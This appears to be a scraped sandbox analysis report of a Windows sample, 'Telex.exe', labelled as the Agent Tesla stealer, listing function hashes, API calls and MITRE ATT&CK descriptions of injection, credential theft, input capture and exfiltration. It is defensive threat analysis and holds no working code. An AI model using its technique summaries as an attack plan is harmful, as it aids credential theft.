Opcode ID: fe0cf1cd226406e402ba44e78c660c155e8e77f9947005342220292579ecd0a4
Instruction ID: ce53a2ba86c13ffd6218d5c9620d8d6b58cf12ea14e51654c73b931f0aca20fa
Opcode Fuzzy Hash: fe0cf1cd226406e402ba44e78c660c155e8e77f9947005342220292579ecd0a4
Instruction Fuzzy Hash: D7113AB5804249CFCB10CF99D645BDEFBF4EB48324F14845AD958A7640D378A689CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F6988, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,024F7229,?,?), ref: 024F73D0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0fedf64bc4cf212af05b6385758f36b9c67d497f87e15c0a120a37e28bdaf8f8
Instruction ID: d03470ecc1bc79b51fb3c80fadc672fa87b572d0590654d019529258f1435cbe
Opcode Fuzzy Hash: 0fedf64bc4cf212af05b6385758f36b9c67d497f87e15c0a120a37e28bdaf8f8
Instruction Fuzzy Hash: 961113B5904209DFCB10DF99C584BEEBBF4EB88324F14845AD958A7240D778A989CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F1CC0, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 024F1D22

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2dfcadb9d2e36495c99f7a936ae3677d506c6f8417b2c2f54f8d6bc12eac2457
Instruction ID: a356d0ff721999e14d76ab96a26f21338c27a7907988c4591bc83baa1a70e9d3
Opcode Fuzzy Hash: 2dfcadb9d2e36495c99f7a936ae3677d506c6f8417b2c2f54f8d6bc12eac2457
Instruction Fuzzy Hash: 961136B59043488BCB10DFAAC5447DFFBF4AF88328F14881AD519B7240DB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F1CB8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 024F1D22

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b4bf634935c39d68b2f8f9179fc15b951da32e69fb948884ab330d62f99ef85b
Instruction ID: 612377c4c61a2597767e4abf0c9040b682e8e3df9bd6d9d1a71db79598dda167
Opcode Fuzzy Hash: b4bf634935c39d68b2f8f9179fc15b951da32e69fb948884ab330d62f99ef85b
Instruction Fuzzy Hash: 901158B5D04208CBCB10CFA9C5447DEFBF4AF88328F14881AC519B7200D734A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB134, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00BCDEA8,?,?,?,?), ref: 00BCDF1D

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d2a3d544bdd96e1a095d28a9591e5c3e1b1f16ce50fa0bd51b1b83ecf6fc833f
Instruction ID: 1b266513d47f40b414afcdc8d5b65da33bd47be4555f2e9be4b837889288861c
Opcode Fuzzy Hash: d2a3d544bdd96e1a095d28a9591e5c3e1b1f16ce50fa0bd51b1b83ecf6fc833f
Instruction Fuzzy Hash: DB11F2B99042099FDB10DF99D588BEEBBF8EB88324F10845AE955B7200D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCDEB9, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00BCDEA8,?,?,?,?), ref: 00BCDF1D

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b65dc1b086de4f3cf721fcacb4324765b087ada803813dbe58aa40d2adc1d66d
Instruction ID: f16a604590fefe711d3c709d1be7ecee6430d9b43cd2ce120ccd3dba1776637f
Opcode Fuzzy Hash: b65dc1b086de4f3cf721fcacb4324765b087ada803813dbe58aa40d2adc1d66d
Instruction Fuzzy Hash: B811F2B99002098FDB10CF99D584BDEBBF4EB88324F14845AD959B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F5848, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 024F58A5

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7cccdbf2c10677127074c9e47a142c159b6b5188eb5d4e82ae5242c02216d130
Instruction ID: de47a518d53a9bc55658bbbb7dd286ef6d01a2bda177d0989dccfd2d46cf6aa4
Opcode Fuzzy Hash: 7cccdbf2c10677127074c9e47a142c159b6b5188eb5d4e82ae5242c02216d130
Instruction Fuzzy Hash: E41103B58003499FDB10CF99C588BDEBBF8FB88324F14841AD914A3600C374A584CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F5841, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 024F58A5

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b95dde5515237257037323830777cd2c6522e54cfc31b76f439f993aba7fccda
Instruction ID: e90f70959437c77120cb95a1173edc268a56618f28885462817a235cf9c2adbb
Opcode Fuzzy Hash: b95dde5515237257037323830777cd2c6522e54cfc31b76f439f993aba7fccda
Instruction Fuzzy Hash: 681103B99003499FDB10CF99D589BDEBFF8FB88324F14885AD954A7600C374A598CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Telex.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre